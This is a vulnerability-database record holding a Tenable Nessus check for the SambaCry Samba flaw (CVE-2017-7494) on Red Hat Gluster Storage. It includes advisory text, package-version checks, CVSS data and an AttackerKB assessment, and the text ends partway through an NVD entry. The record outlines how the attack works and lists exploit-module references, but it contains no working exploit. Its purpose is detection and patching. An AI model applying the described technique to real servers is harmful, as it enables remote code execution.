{"id": "REDHAT-RHSA-2017-1273.NASL", "bulletinFamily": "scanner", "title": "RHEL 6 / 7 : Storage Server (RHSA-2017:1273) (SambaCry)", "description": "An update for samba is now available for Red Hat Gluster Storage 3.2\nfor RHEL 6 and Red Hat Gluster Storage 3.2 for RHEL 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) protocol and the related Common Internet File System (CIFS)\nprotocol, which allow PC-compatible machines to share files, printers,\nand various information.\n\nSecurity Fix(es) :\n\n* A remote code execution flaw was found in Samba. A malicious\nauthenticated samba client, having write access to the samba share,\ncould use this flaw to execute arbitrary code as root. (CVE-2017-7494)\n\nRed Hat would like to thank the Samba project for reporting this\nissue. Upstream acknowledges steelo as the original reporter.", "published": "2017-05-26T00:00:00", "modified": "2021-03-02T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/100453", "reporter": "This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://access.redhat.com/errata/RHSA-2017:1273", "https://access.redhat.com/security/cve/cve-2017-7494"], "cvelist": ["CVE-2017-7494"], "type": "nessus", "lastseen": "2021-03-01T05:39:25", "edition": 39, "viewCount": 26, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:49AAF9A1-B710-4CA1-AAFA-3C022294A5D4"]}, {"type": "cve", "idList": ["CVE-2017-7494"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:D20A6BA20BB0FAD48EDDE6836F08EDBA"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-CVE-2017-7494.NSE"]}, {"type": "f5", "idList": ["F5:K13551136"]}, {"type": "seebug", "idList": ["SSV:93139"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:70F4A599D7DDC69173F490543EA5873E", "RAPID7COMMUNITY:38689BEB2152AB6F6A52F8E26AA1499F"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786995", "MYHACK58:62201786477", "MYHACK58:62201786521", "MYHACK58:62201786440"]}, {"type": "thn", "idList": ["THN:B1F7A116FFB321FFB433B2511F0594AA", "THN:9D54715DA42C8EB2A5D3C8AA0A5EE0B7", "THN:4706A097E7EBD85B2426246B35CDC5E6", "THN:9DF1743B35B2E69D4835136091D08EAD"]}, {"type": "fedora", "idList": ["FEDORA:219F3605E539", "FEDORA:0B8006061CC2", "FEDORA:BC7B0601FC16"]}, {"type": "threatpost", "idList": ["THREATPOST:6B393C6EA80E795EF303485AFABE5327", "THREATPOST:5800C37DAB0716BD2D308FB187B6B7E1"]}, {"type": "ubuntu", "idList": ["USN-3296-2", "USN-3296-1"]}, {"type": "nessus", "idList": ["FEDORA_2017-642A0ECA75.NASL", "SLACKWARE_SSA_2017-144-01.NASL", "SUSE_SU-2017-1393-1.NASL", "REDHAT-RHSA-2017-1270.NASL", "ORACLELINUX_ELSA-2017-1272.NASL", "SL_20170524_SAMBA4_ON_SL6_X.NASL", "FEDORA_2017-C729C6123C.NASL", "SUSE_SU-2017-1392-1.NASL", "FEDORA_2017-570C0071C4.NASL", "REDHAT-RHSA-2017-1272.NASL"]}, {"type": "avleonov", "idList": ["AVLEONOV:40C2BE2DE75816DD7ED47DA106AF9627"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142782", "PACKETSTORM:142715", "PACKETSTORM:142657"]}, {"type": "suse", "idList": ["SUSE-SU-2017:1393-1", "OPENSUSE-SU-2017:1415-1", "SUSE-SU-2017:1392-1", "OPENSUSE-SU-2017:1401-1", "SUSE-SU-2017:1391-1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20171129-01-SAMBA", "HUAWEI-SA-20170613-01-SAMBA"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310851559", "OPENVAS:703860", "OPENVAS:1361412562310811055", "OPENVAS:1361412562310851557", "OPENVAS:1361412562310882723", "OPENVAS:1361412562310872719", "OPENVAS:1361412562310872718", "OPENVAS:1361412562310871821", "OPENVAS:1361412562310882724", "OPENVAS:1361412562310890951"]}, {"type": "redhat", "idList": ["RHSA-2017:1273", "RHSA-2017:1271", "RHSA-2017:1272", "RHSA-2017:1390", "RHSA-2017:1270"]}, {"type": "centos", "idList": ["CESA-2017:1271", "CESA-2017:1270"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/SAMBA/IS_KNOWN_PIPENAME"]}, {"type": "oraclelinux", "idList": ["ELSA-2017-1272", "ELSA-2017-1270", "ELSA-2017-1271"]}, {"type": "slackware", "idList": ["SSA-2017-144-01"]}, {"type": "cisa", "idList": ["CISA:384A71FB1AD858FAC86EEB1A7660E778"]}, {"type": "exploitdb", "idList": ["EDB-ID:42060", "EDB-ID:42084"]}, {"type": "canvas", "idList": ["SAMBA_IS_KNOWN_PIPENAME"]}, {"type": "zdt", "idList": ["1337DAY-ID-27859"]}, {"type": "talosblog", "idList": ["TALOSBLOG:9256DE4CBAB937F2D9EAEDCA068E3DE9"]}, {"type": "freebsd", "idList": ["6F4D96C0-4062-11E7-B291-B499BAEBFEAF"]}, {"type": "archlinux", "idList": ["ASA-201705-22"]}, {"type": "cisco", "idList": ["CISCO-SA-20170530-SAMBA"]}, {"type": "saint", "idList": ["SAINT:3579A721D51A069C725493EA48A26E42"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:11BDEE18B40708887778CCF837705185"]}], "modified": "2021-03-01T05:39:25", "rev": 2}, "score": {"value": 9.2, "vector": "NONE", "modified": "2021-03-01T05:39:25", "rev": 2}, "vulnersScore": 9.2}, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:1273. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100453);\n script_version(\"3.18\");\n script_cvs_date(\"Date: 2019/10/24 15:35:43\");\n\n script_cve_id(\"CVE-2017-7494\");\n script_xref(name:\"RHSA\", value:\"2017:1273\");\n\n script_name(english:\"RHEL 6 / 7 : Storage Server (RHSA-2017:1273) (SambaCry)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for samba is now available for Red Hat Gluster Storage 3.2\nfor RHEL 6 and Red Hat Gluster Storage 3.2 for RHEL 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) protocol and the related Common Internet File System (CIFS)\nprotocol, which allow PC-compatible machines to share files, printers,\nand various information.\n\nSecurity Fix(es) :\n\n* A remote code execution flaw was found in Samba. A malicious\nauthenticated samba client, having write access to the samba share,\ncould use this flaw to execute arbitrary code as root. (CVE-2017-7494)\n\nRed Hat would like to thank the Samba project for reporting this\nissue. Upstream acknowledges steelo as the original reporter.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2017:1273\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-7494\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba is_known_pipename() Arbitrary Module Load');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ctdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ctdb-tests\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libsmbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libwbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libwbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-client-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-common-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-common-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-dc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-dc-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-krb5-printing\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-pidl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-test-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-vfs-glusterfs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-winbind-krb5-locator\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-winbind-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/26\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x / 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2017:1273\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL6\", rpm:\"glusterfs-server\") || rpm_exists(release:\"RHEL7\", rpm:\"glusterfs-server\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Storage Server\");\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"ctdb-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"ctdb-tests-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"libsmbclient-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"libsmbclient-devel-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"libwbclient-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"libwbclient-devel-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-client-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-client-libs-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"samba-common-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-common-libs-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-common-tools-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-dc-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-dc-libs-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-debuginfo-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-devel-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-krb5-printing-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-libs-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"samba-pidl-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-python-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-test-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-test-libs-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-vfs-glusterfs-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-winbind-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-winbind-clients-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-winbind-krb5-locator-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-winbind-modules-4.4.6-5.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"ctdb-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"ctdb-tests-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"libsmbclient-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"libsmbclient-devel-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"libwbclient-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"libwbclient-devel-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-client-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-client-libs-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"samba-common-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-common-libs-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-common-tools-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-dc-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-dc-libs-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-debuginfo-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-devel-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-krb5-printing-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-libs-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"samba-pidl-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-python-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-test-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-test-libs-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-vfs-glusterfs-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-winbind-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-winbind-clients-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-winbind-krb5-locator-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-winbind-modules-4.4.6-5.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ctdb / ctdb-tests / libsmbclient / libsmbclient-devel / libwbclient / etc\");\n }\n}\n", "naslFamily": "Red Hat Local Security Checks", "pluginID": "100453", "cpe": ["p-cpe:/a:redhat:enterprise_linux:libsmbclient-devel", "p-cpe:/a:redhat:enterprise_linux:samba-krb5-printing", "p-cpe:/a:redhat:enterprise_linux:ctdb-tests", "p-cpe:/a:redhat:enterprise_linux:samba-common-libs", "p-cpe:/a:redhat:enterprise_linux:samba-test-libs", "p-cpe:/a:redhat:enterprise_linux:samba-dc", "p-cpe:/a:redhat:enterprise_linux:samba-python", "p-cpe:/a:redhat:enterprise_linux:samba-devel", "p-cpe:/a:redhat:enterprise_linux:samba-client-libs", "p-cpe:/a:redhat:enterprise_linux:samba", "p-cpe:/a:redhat:enterprise_linux:samba-common-tools", "p-cpe:/a:redhat:enterprise_linux:samba-winbind-clients", "p-cpe:/a:redhat:enterprise_linux:ctdb", "p-cpe:/a:redhat:enterprise_linux:samba-common", "p-cpe:/a:redhat:enterprise_linux:samba-vfs-glusterfs", "p-cpe:/a:redhat:enterprise_linux:samba-winbind-modules", "p-cpe:/a:redhat:enterprise_linux:libwbclient-devel", "p-cpe:/a:redhat:enterprise_linux:libsmbclient", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:libwbclient", "p-cpe:/a:redhat:enterprise_linux:samba-winbind-krb5-locator", "p-cpe:/a:redhat:enterprise_linux:samba-pidl", "p-cpe:/a:redhat:enterprise_linux:samba-client", "p-cpe:/a:redhat:enterprise_linux:samba-debuginfo", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:samba-dc-libs", "p-cpe:/a:redhat:enterprise_linux:samba-winbind", "p-cpe:/a:redhat:enterprise_linux:samba-libs", "p-cpe:/a:redhat:enterprise_linux:samba-test"], "scheme": null, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}}

{"attackerkb": [{"lastseen": "2021-01-28T21:27:26", "bulletinFamily": "info", "cvelist": ["CVE-2017-7494"], "description": "Samba since version 3.5.0 and before 4.6.4, 4.5.10 and 4.4.14 is vulnerable to remote code execution vulnerability, allowing a malicious client to upload a shared library to a writable share, and then cause the server to load and execute it.\n\n \n**Recent assessments:** \n \n**bwatters-r7** at April 14, 2020 4:47pm UTC reported:\n\nThis vulnerability was the Linux equivalent to Wanncry according to some journalists. It was not. \nThis vulnerability (AKA SambaCry) worked by writing a link library (.so file) to a linux host running Sama in such a way that samba then loaded it. On the face of it, this was a problem, but attackers had 2 large hurdles:\n\n 1. Anonymous file creation had to be enabled and \n\n 2. Attackers had to guess the right absolute path \n\n\nIn the first case, it is unlikely any enterprise will have anonymous file creation turned on, so immediately attackers are thwarted. In the second case, an attacker must guess the absolute path to the share as it is mounted on the remote computer. There are obvious guesses attackers could make, but nothing that was guaranteed. This was the classic example of a terrifying exploit mitigated by large caveats. Most common-sense approaches to SAMBA and SMB shared will mitigate this threat, namely not opening SMB/SAMBA shares to the internet, not allowing anonymous logins, and keeping software up to date.\n", "modified": "2020-07-30T00:00:00", "published": "2017-05-30T00:00:00", "id": "AKB:49AAF9A1-B710-4CA1-AAFA-3C022294A5D4", "href": "https://attackerkb.com/topics/1qZ2S85EjE/cve-2017-7494", "type": "attackerkb", "title": "CVE-2017-7494", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2021-02-02T06:36:50", "description": "Samba since version 3.5.0 and before 4.6.4, 4.5.10 and 4.4.14 is vulnerable to remote code execution vulnerability, allowing a malicious client to upload a shared library to a writable share, and then cause the server to load and execute it.", "edition": 4, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-30T18:29:00", "title": "CVE-2017-7494", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7494"], "modified": "2018-10-21T10:29:00", "cpe": ["cpe:/a:samba:samba:4.0.6", "cpe:/a:samba:samba:4.5.7", "cpe:/a:samba:samba:4.0.8", "cpe:/a:samba:samba:3.5.5", "cpe:/a:samba:samba:4.1.4", "cpe:/a:samba:samba:4.1.8", "cpe:/a:samba:samba:4.2.11", "cpe:/a:samba:samba:4.4.7", "cpe:/a:samba:samba:4.2.2", "cpe:/a:samba:samba:4.5.6", "cpe:/a:samba:samba:3.5.17", "cpe:/a:samba:samba:4.1.10", "cpe:/a:samba:samba:4.0.19", "cpe:/a:samba:samba:4.1.5", "cpe:/a:samba:samba:4.4.3", "cpe:/a:samba:samba:4.4.5", "cpe:/a:samba:samba:4.0.22", "cpe:/a:samba:samba:4.4.8", "cpe:/a:samba:samba:3.5.8", "cpe:/a:samba:samba:3.6.13", "cpe:/a:samba:samba:3.5.11", "cpe:/a:samba:samba:3.6.18", "cpe:/a:samba:samba:4.0.4", "cpe:/a:samba:samba:4.2.4", "cpe:/a:samba:samba:4.5.4", "cpe:/a:samba:samba:3.5.13", "cpe:/a:samba:samba:4.4.11", "cpe:/a:samba:samba:4.6.1", "cpe:/a:samba:samba:4.5.9", "cpe:/a:samba:samba:3.5.12", "cpe:/a:samba:samba:4.1.13", "cpe:/a:samba:samba:4.1.19", "cpe:/a:samba:samba:4.6.3", "cpe:/a:samba:samba:4.3.7", "cpe:/a:samba:samba:4.0.15", "cpe:/a:samba:samba:3.6.25", "cpe:/a:samba:samba:4.1.20", "cpe:/a:samba:samba:4.2.6", "cpe:/a:samba:samba:3.6.19", "cpe:/a:samba:samba:3.6.7", "cpe:/a:samba:samba:3.6.24", "cpe:/a:samba:samba:3.6.21", "cpe:/a:samba:samba:3.5.19", "cpe:/a:samba:samba:4.4.13", "cpe:/a:samba:samba:4.0.12", "cpe:/a:samba:samba:4.5.5", "cpe:/a:samba:samba:4.0.3", "cpe:/a:samba:samba:4.2.8", "cpe:/a:samba:samba:4.3.11", "cpe:/a:samba:samba:3.5.15", "cpe:/a:samba:samba:4.5.0", "cpe:/a:samba:samba:4.3.4", "cpe:/a:samba:samba:4.2.14", "cpe:/a:samba:samba:4.4.12", "cpe:/a:samba:samba:4.1.17", "cpe:/a:samba:samba:4.1.1", "cpe:/a:samba:samba:4.3.3", "cpe:/a:samba:samba:4.0.24", "cpe:/a:samba:samba:4.0.2", "cpe:/a:samba:samba:4.0.7", "cpe:/a:samba:samba:3.6.2", "cpe:/a:samba:samba:3.6.14", "cpe:/a:samba:samba:3.5.2", "cpe:/a:samba:samba:4.3.1", "cpe:/a:samba:samba:4.0.16", "cpe:/a:samba:samba:3.5.21", "cpe:/a:samba:samba:3.6.12", "cpe:/a:samba:samba:3.5.6", "cpe:/a:samba:samba:4.0.11", "cpe:/a:samba:samba:4.0.25", "cpe:/a:samba:samba:4.0.9", "cpe:/a:samba:samba:3.6.10", "cpe:/a:samba:samba:4.1.6", "cpe:/a:samba:samba:4.1.12", "cpe:/a:samba:samba:4.1.21", "cpe:/a:samba:samba:3.6.9", "cpe:/a:samba:samba:3.6.0", "cpe:/a:samba:samba:4.2.5", "cpe:/a:samba:samba:4.0.10", "cpe:/a:samba:samba:4.0.23", "cpe:/a:samba:samba:4.2.12", "cpe:/a:samba:samba:4.1.0", "cpe:/a:samba:samba:4.5.2", "cpe:/a:samba:samba:3.5.22", "cpe:/a:samba:samba:3.6.11", 